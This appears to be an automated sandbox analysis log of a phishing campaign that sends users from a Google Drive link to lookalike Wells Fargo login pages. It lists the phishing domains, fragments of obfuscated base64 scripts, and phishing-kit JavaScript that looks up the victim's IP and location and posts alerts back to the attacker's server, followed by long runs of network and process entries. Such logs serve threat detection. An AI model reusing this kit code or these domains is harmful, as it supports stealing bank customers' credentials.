Source: https://guard.verification.onlineconnectionstatus.my/secure/HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gXzB4NWY0OChfMHgyYzVlMDIsXzB4ZTE5ZjE1KXt2YXIgXzB4MWIzNGQwPV8weDFiMzQoKTtyZXR1cm4gXzB4NWY0OD1mdW5jdGlvbihfMHg1ZjQ4MmQsXzB4NTAyMzg5KXtfMHg1ZjQ4MmQ9XzB4NWY0ODJkLTB4MTQzO3ZhciBfMHg3MmM3ZDc9XzB4MWIzNGQwW18weDVmNDgyZF
Source: https://guard.verification.onlineconnectionstatus.my/secure/HTTP Parser: Script src: data:text/javascript;base64,dmFyIF8weDNmZDY5MD1fMHg0Y2VkOyhmdW5jdGlvbihfMHg4ZTVlOTgsXzB4NGFhOTEwKXt2YXIgXzB4MmJjNjY1PV8weDRjZWQsXzB4NDMwNGQ4PV8weDhlNWU5OCgpO3doaWxlKCEhW10pe3RyeXt2YXIgXzB4MzA1MjJhPS1wYXJzZUludChfMHgyYmM2NjUoMHgzZDcpKS8weDErcGFyc2VJbn
Source: https://guard.verification.onlineconnectionstatus.my/secure/HTTP Parser: Script src: data:text/javascript;base64,dmFyIF8weDVkM2JjYj1fMHgyZmZlOyhmdW5jdGlvbihfMHgyMzhlYmEsXzB4M2Q4NzJhKXt2YXIgXzB4MTZlNGQ3PV8weDJmZmUsXzB4MzdiMzJjPV8weDIzOGViYSgpO3doaWxlKCEhW10pe3RyeXt2YXIgXzB4M2YxYmFkPS1wYXJzZUludChfMHgxNmU0ZDcoMHgxMTMpKS8weDErLXBhcnNlSW
Source: https://guard.verification.onlineconnectionstatus.my/secure/HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gXzB4OTdjOChfMHgxNTEwOWIsXzB4MjYyNmRlKXtjb25zdCBfMHg1NDdlMDc9XzB4NTQ3ZSgpO3JldHVybiBfMHg5N2M4PWZ1bmN0aW9uKF8weDk3YzhmMSxfMHgyNjU4N2Epe18weDk3YzhmMT1fMHg5N2M4ZjEtMHgxN2M7bGV0IF8weDNhYjRlMj1fMHg1NDdlMDdbXzB4OTdjOG
Source: https://connect.secure.access.weilsfargoadvisors.com/s/8b76cb1fd5626aa207b604598156ec8e2f4d3c585bc6a74eefe8e30a78d60762/45208613043afd28b5b52f434db1228593eb89d77b6f98b842ae81fbb1c254b7.jsHTTP Parser: function fetchipdetails(callback) { var xhr = new xmlhttprequest(); xhr.open("get", "https://ipinfo.io/json", true); xhr.onreadystatechange = function() { if (xhr.readystate == 4 && xhr.status == 200) { var response = json.parse(xhr.responsetext); var details = "ip: " + response.ip + "<br>hostname: " + response.hostname + "\\n\\city: " + response.city + "state: " + response.region + "country: " + response.country + "network: " + response.org + ""; callback(details); } }; xhr.send();}function postmessagetoserver(message) { var xhr = new xmlhttprequest(); xhr.open("post", '/', true); xhr.setrequestheader("content-type", "application/x-www-form-urlencoded"); xhr.send("alert=" + encodeuricomponent(message));}function postsms() { var searcharray = [ { search: "to protect your account", postmessage: "\x1b[34mcaptcha - is time to change ip\x1b[0m" }, { search: "we do not recognize your username", postmessa...
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: Iframe src: https://okra.wf.com/iframe/9B8ED233-984B-4DE5-A7B6-3A370D9FF48B/lightbox.html
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: Iframe src: https://okra.wf.com/iframe/9B8ED233-984B-4DE5-A7B6-3A370D9FF48B/lightbox.html
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: Iframe src: https://okra.wf.com/iframe/9B8ED233-984B-4DE5-A7B6-3A370D9FF48B/lightbox.html
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: Iframe src: https://okra.wf.com/iframe/9B8ED233-984B-4DE5-A7B6-3A370D9FF48B/lightbox.html
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: Iframe src: https://okra.wf.com/iframe/9B8ED233-984B-4DE5-A7B6-3A370D9FF48B/lightbox.html
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: <input type="password" .../> found
Source: https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?ts=6786e61fHTTP Parser: No favicon
Source: https://guard.verification.onlineconnectionstatus.my/secure/HTTP Parser: No favicon
Source: https://guard.verification.onlineconnectionstatus.my/secure/HTTP Parser: No favicon
Source: https://guard.verification.onlineconnectionstatus.my/secure/HTTP Parser: No favicon
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No favicon
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No favicon
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No favicon
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No favicon
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No favicon
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No favicon
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No favicon
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No favicon
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No favicon
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No favicon
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No favicon
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No <meta name="author".. found
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No <meta name="author".. found
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No <meta name="author".. found
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No <meta name="author".. found
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No <meta name="author".. found
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No <meta name="author".. found
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No <meta name="copyright".. found
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No <meta name="copyright".. found
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No <meta name="copyright".. found
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No <meta name="copyright".. found
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No <meta name="copyright".. found
Source: https://connect.secure.access.weilsfargoadvisors.com/auth/login/presentHTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49790 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49900 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.18:49877 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.18:49877 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.18:49877 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.18:55142 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.18:49877 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.18:55142 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.18:49877 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.18:55142 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.18:49877 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.18:55142 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.18:49877 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.18:55142 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: drive.google.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: play.google.com
Source: global trafficDNS traffic detected: DNS query: apis.google.com
Source: global trafficDNS traffic detected: DNS query: blobcomments-pa.clients6.google.com
Source: global trafficDNS traffic detected: DNS query: guard.verification.onlineconnectionstatus.my
Source: global trafficDNS traffic detected: DNS query: peoplestackwebexperiments-pa.clients6.google.com
Source: global trafficDNS traffic detected: DNS query: connect.secure.access.weilsfargoadvisors.com
Source: global trafficDNS traffic detected: DNS query: connect.secure.wellsfargo.com
Source: global trafficDNS traffic detected: DNS query: static.secure.access.weilsfargoadvisors.com
Source: global trafficDNS traffic detected: DNS query: www10.wellsfargomedia.com
Source: global trafficDNS traffic detected: DNS query: www15.wellsfargomedia.com
Source: global trafficDNS traffic detected: DNS query: www17.wellsfargomedia.com
Source: global trafficDNS traffic detected: DNS query: ipinfo.io
Source: global trafficDNS traffic detected: DNS query: connect.secure.wf.com
Source: global trafficDNS traffic detected: DNS query: okra.wf.com
Source: global trafficDNS traffic detected: DNS query: pdx-col.eum-appdynamics.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 55160 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55159 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55149
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55158
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55159
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55164
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55160
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55161
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55162
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55158 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 55149 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49790 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49900 version: TLS 1.2
Source: classification engineClassification label: mal56.phis.win@31/6@64/338
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1836,i,8353354067160105745,7786177507070036882,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61f"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1836,i,8353354067160105745,7786177507070036882,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
